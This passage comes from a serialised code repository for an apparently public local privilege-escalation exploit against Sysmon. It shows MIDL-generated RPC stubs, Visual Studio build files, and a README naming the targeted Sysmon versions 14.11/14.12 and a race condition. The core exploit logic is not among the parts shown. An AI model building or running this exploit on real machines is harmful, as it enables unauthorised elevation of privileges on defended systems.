0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcClientInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    &DefaultIfName__MIDL_AutoBindHandle,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n    0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ProxyInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    0,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\nstatic const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =\r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    \r\n    };\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  },
  {
    "path": "v1/SysmonEoP/sysmon_h.h",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n\r\n\r\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\r\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\r\n#define __REQUIRED_RPCNDR_H_VERSION__ 500\r\n#endif\r\n\r\n#include \"rpc.h\"\r\n#include \"rpcndr.h\"\r\n\r\n#ifndef __RPCNDR_H_VERSION__\r\n#error this stub requires an updated version of <rpcndr.h>\r\n#endif /* __RPCNDR_H_VERSION__ */\r\n\r\n\r\n#ifndef __sysmon_h_h__\r\n#define __sysmon_h_h__\r\n\r\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\r\n#pragma once\r\n#endif\r\n\r\n/* Forward Declarations */ \r\n\r\n#ifdef __cplusplus\r\nextern \"C\"{\r\n#endif \r\n\r\n\r\n#ifndef __DefaultIfName_INTERFACE_DEFINED__\r\n#define __DefaultIfName_INTERFACE_DEFINED__\r\n\r\n/* interface DefaultIfName */\r\n/* [version][uuid] */ \r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle);\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1);\r\n\r\n\r\n\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;\r\n#endif /* __DefaultIfName_INTERFACE_DEFINED__ */\r\n\r\n/* Additional Prototypes for ALL interfaces */\r\n\r\n/* end of Additional Prototypes */\r\n\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n\r\n#endif\r\n\r\n\r\n"
  },
  {
    "path": "v1/SysmonEoP/sysmon_s.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n\r\nextern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;\r\n\r\nextern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;\r\n\r\nstatic const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =\r\n    {\r\n    sizeof(RPC_SERVER_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ServerInfo,\r\n    0x06000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    {\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =\r\n    {\r\n    NdrServerCall2,\r\n    NdrServerCall2,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table\r\n    };\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include \"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcServerInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n    0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ServerInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =\r\n    {\r\n    NdrServerCallAll,\r\n    NdrServerCallAll,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    (RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\n\r\nstatic const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = \r\n    {\r\n    (SERVER_ROUTINE)Proc0,\r\n    (SERVER_ROUTINE)Proc1\r\n    };\r\n\r\nstatic const MIDL_SERVER_INFO DefaultIfName_ServerInfo = \r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    DefaultIfName_ServerRoutineTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    (unsigned short *) DefaultIfName_FormatStringOffsetTable,\r\n    0,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    };\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  },
  {
    "path": "v2/README.md",
    "content": "Exploit for versions 14.11/14.12 (works on versions below 14.11 but less stable as we need to race with Sysmon).\n\n![PoC](poc.PNG)\n"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.sln",
    "content": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30717.126\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"SysmonEOP\", \"SysmonEOP.vcxproj\", \"{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>\r\n    <RootNamespace>SysmonEOP</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    